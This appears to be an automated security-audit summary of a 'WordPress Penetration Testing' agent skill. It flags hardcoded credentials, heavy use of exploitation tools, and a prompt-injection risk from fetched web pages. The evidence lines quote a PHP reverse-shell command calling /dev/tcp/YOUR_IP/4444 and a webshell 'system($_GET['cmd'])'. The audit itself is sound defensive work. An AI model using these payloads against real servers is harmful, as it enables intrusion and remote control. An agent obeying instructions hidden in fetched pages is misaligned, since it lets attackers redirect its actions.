The Agent Skills Directory

[CREDENTIALS_UNSAFE]: The skill contains hardcoded credentials in its example commands.
Evidence: set PASSWORD jessica found in the Metasploit shell upload and plugin exploitation examples.
[COMMAND_EXECUTION]: The skill relies extensively on the execution of various command-line tools for security assessment and exploitation.
Evidence: Commands using wpscan, nmap, msfconsole, curl, and wget are provided throughout the document to interact with remote systems.
[REMOTE_CODE_EXECUTION]: The skill provides methodologies for generating and executing malicious code on remote target servers.
Evidence: Instructions for creating a PHP reverse shell (exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");) and a malicious WordPress plugin containing a webshell (system($_GET['cmd']);).
[PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection through the ingestion of untrusted data from target websites.
Ingestion points: The skill uses curl to fetch and display content from target websites (e.g., curl -s http://target.com | grep -i wordpress).
Boundary markers: There are no explicit boundary markers or instructions to the agent to ignore potentially malicious instructions embedded in the target's HTML or metadata.
Capability inventory: The skill has access to powerful capabilities including network operations (curl, nmap), file writing (cat > malicious.php), and exploitation frameworks (msfconsole).
Sanitization: No sanitization or filtering of the fetched web content is performed before it is processed by the agent.

WordPress Penetration Testing